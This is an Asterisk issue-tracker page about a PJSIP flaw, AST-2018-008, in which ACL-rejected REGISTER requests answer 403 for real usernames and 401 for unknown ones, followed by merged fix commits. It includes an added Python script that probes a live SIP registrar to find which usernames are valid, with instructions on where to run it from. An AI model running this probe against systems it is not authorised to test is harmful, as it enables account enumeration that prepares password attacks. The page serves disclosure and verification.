Asterisk: ASTERISK-27818

Username bruteforce is possible when using ACL with PJSIP

    Details

    • PJSIP Bundled: Yes

      Description

      When ACL rules block registration they respond with a 403 Forbidden when the username matches and with 401 Unauthorized when the username does not match.

      This essentially allows someone to constantly test usernames and see which ones are valid and which ones are not.

      I've only encountered this problem on my setup working with Realtime. Not sure what else is affected.
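      The check described above, as an added example that is not part of the issue report or of the Asterisk code base: it sends an unauthenticated SIP REGISTER for each candidate username and compares the first final status code against the code the registrar returns for decoy names that are known not to exist. If the decoys get one code (401 in the report) and a real name gets another (403), the registrar is an enumeration oracle; a patched server answers both the same way. The registrar host, port, decoy names and the canned responses used by the offline demo are all assumptions made for this example; per the report, the differing codes only appear when the probing address is one the ACL rejects.

```python
"""Probe a SIP registrar for the username-enumeration oracle described in
ASTERISK-27818 / AST-2018-008 (ACL-rejected REGISTER answered with 403 for a
known user and 401 for an unknown one).

Added example, not Asterisk project code. Host, port and decoy names are
assumptions; SAMPLE_RESPONSES are constructed for the offline demo.
"""
import re
import socket
import sys
import uuid
from typing import Dict, List, Optional, Tuple

STATUS_RE = re.compile(rb"^SIP/2\.0 (\d{3})\b")


def build_register(host: str, user: str, local_port: int = 5060) -> bytes:
    """Minimal REGISTER with no credentials; we only care about the reply code."""
    tag = uuid.uuid4().hex[:8]
    lines = [
        f"REGISTER sip:{host} SIP/2.0",
        f"Via: SIP/2.0/UDP 0.0.0.0:{local_port};branch=z9hG4bK{uuid.uuid4().hex[:16]};rport",
        "Max-Forwards: 70",
        f"From: <sip:{user}@{host}>;tag={tag}",
        f"To: <sip:{user}@{host}>",
        f"Call-ID: {uuid.uuid4().hex}",
        "CSeq: 1 REGISTER",
        f"Contact: <sip:{user}@0.0.0.0:{local_port}>",
        "Expires: 60",
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_status(response: bytes) -> Optional[int]:
    """Numeric status code of a SIP response, or None if the status line is malformed."""
    m = STATUS_RE.match(response)
    return int(m.group(1)) if m else None


def find_oracle(codes: Dict[str, Optional[int]], decoys: List[str]) -> Tuple[Optional[int], List[str]]:
    """codes maps username -> first final status code (None = no reply).

    Returns (baseline, suspected): baseline is the code the server gives for
    the decoy (non-existent) names; suspected lists probed names that got a
    different code and are therefore likely real endpoints. An empty
    suspected list means no oracle was observed for this set of names.
    """
    baseline_codes = {codes[d] for d in decoys}
    if len(baseline_codes) != 1:
        raise ValueError(f"decoys disagree, cannot establish a baseline: {baseline_codes}")
    baseline = baseline_codes.pop()
    suspected = sorted(u for u, c in codes.items() if u not in decoys and c != baseline)
    return baseline, suspected


def probe(host: str, users: List[str], port: int = 5060, timeout: float = 2.0) -> Dict[str, Optional[int]]:
    """Live probe over UDP: one REGISTER per user, skipping provisional 1xx replies."""
    codes: Dict[str, Optional[int]] = {}
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for user in users:
            s.sendto(build_register(host, user), (host, port))
            codes[user] = None
            for _ in range(4):  # a few datagrams at most per probe
                try:
                    data, _ = s.recvfrom(4096)
                except socket.timeout:
                    break
                code = parse_status(data)
                if code is not None and code >= 200:
                    codes[user] = code
                    break
    return codes


# Constructed replies mimicking the behaviour in the report (not captured traffic).
SAMPLE_RESPONSES = {
    "alice": b"SIP/2.0 403 Forbidden\r\nCSeq: 1 REGISTER\r\nContent-Length: 0\r\n\r\n",
    "zz-decoy-1": b"SIP/2.0 401 Unauthorized\r\nCSeq: 1 REGISTER\r\nContent-Length: 0\r\n\r\n",
    "zz-decoy-2": b"SIP/2.0 401 Unauthorized\r\nCSeq: 1 REGISTER\r\nContent-Length: 0\r\n\r\n",
}
DECOYS = ["zz-decoy-1", "zz-decoy-2"]


def demo() -> Tuple[Optional[int], List[str]]:
    """Offline run over the constructed responses; returns (401, ['alice'])."""
    codes = {u: parse_status(r) for u, r in SAMPLE_RESPONSES.items()}
    return find_oracle(codes, DECOYS)


if __name__ == "__main__":
    if len(sys.argv) >= 3:  # python3 probe.py <registrar-host> <user> [<user> ...]
        host, users = sys.argv[1], sys.argv[2:]
        baseline, suspected = find_oracle(probe(host, users + DECOYS), DECOYS)
    else:
        baseline, suspected = demo()
    print(f"baseline code for unknown users: {baseline}; suspected valid: {suspected}")
```

      Run it from an address the PJSIP ACL rejects; from an allowed address an unauthenticated REGISTER is challenged with 401 for any name and the comparison tells you nothing. Use at least two decoys so a single lost datagram cannot be mistaken for a baseline.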

      1. AST-2018-008.pdf (45 kB, Richard Mudgett)
      2. jira_asterisk_27818_v13.patch (3 kB, Richard Mudgett)


          Activity

          Friendly Automation added a comment -

          Change 9157 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9157

          Friendly Automation added a comment -

          Change 9156 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9156

          Friendly Automation added a comment -

          Change 9154 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9154

          Friendly Automation added a comment -

          Change 9173 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9173

          Friendly Automation added a comment -

          Change 9172 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9172

            People

            • Watchers: 4